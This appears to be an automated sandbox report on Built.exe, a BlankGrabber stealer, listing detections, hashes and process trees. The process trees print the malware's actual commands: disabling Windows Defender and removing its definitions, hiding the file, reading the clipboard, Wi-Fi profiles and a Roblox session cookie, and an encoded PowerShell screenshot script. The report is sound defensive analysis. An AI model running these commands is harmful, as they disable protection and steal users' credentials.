Analysis Overview
SHA256
5abca78c05174b85888fba097e89106162261ecdac73f09d035eb22aec3261f6
Threat Level: Known bad
The file Built.exe was found to be: Known bad.
Malicious Activity Summary
Blankgrabber family
A stealer written in Python and packaged with Pyinstaller
Command and Scripting Interpreter: PowerShell
UPX packed file
Reads user/profile data of web browsers
ACProtect 1.3x - 1.4x DLL software
Executes dropped EXE
Loads dropped DLL
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Hide Artifacts: Hidden Files and Directories
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
Suspicious use of WriteProcessMemory
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Views/modifies file attributes
Gathers system information
Enumerates processes with tasklist
Detects videocard installed
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-26 18:05
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-26 18:05
Reported
2024-06-26 18:08
Platform
win7-20231129-en
Max time kernel
118s
Max time network
118s
Command Line
Signatures
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2232 wrote to memory of 1704 | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | C:\Users\Admin\AppData\Local\Temp\Built.exe |
| PID 2232 wrote to memory of 1704 | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | C:\Users\Admin\AppData\Local\Temp\Built.exe |
| PID 2232 wrote to memory of 1704 | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | C:\Users\Admin\AppData\Local\Temp\Built.exe |
| PID 2232 wrote to memory of 1704 | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | C:\Users\Admin\AppData\Local\Temp\Built.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI22322\python311.dll
| MD5 | e7103e2bf67b33f3c866e944329ddd7b |
| SHA1 | 3bab461ec7782a4949964b591c14d8f3bacc1098 |
| SHA256 | b36c67f6ab5dbe6104f4abf3f1c19a702af20d8bedcf9ef5e499dc84e62d6fbd |
| SHA512 | b45629330d0f67788b4c7f1ec61bce0b64f567d6bcfcbccb14289284672eee81d3d8f4036d58e9f24f3c86b5e67d2b5d58253d03249c4e151ac0a0ba2134d88b |
memory/1704-23-0x0000000074530000-0x0000000074A3A000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-26 18:05
Reported
2024-06-26 18:08
Platform
win10v2004-20240611-en
Max time kernel
144s
Max time network
117s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI16282\rar.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\SysWOW64\tasklist.exe
tasklist /FO LIST
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\SysWOW64\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\SysWOW64\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
C:\Windows\SysWOW64\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\SysWOW64\tasklist.exe
tasklist /FO LIST
C:\Windows\SysWOW64\tasklist.exe
tasklist /FO LIST
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\SysWOW64\tasklist.exe
tasklist /FO LIST
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABT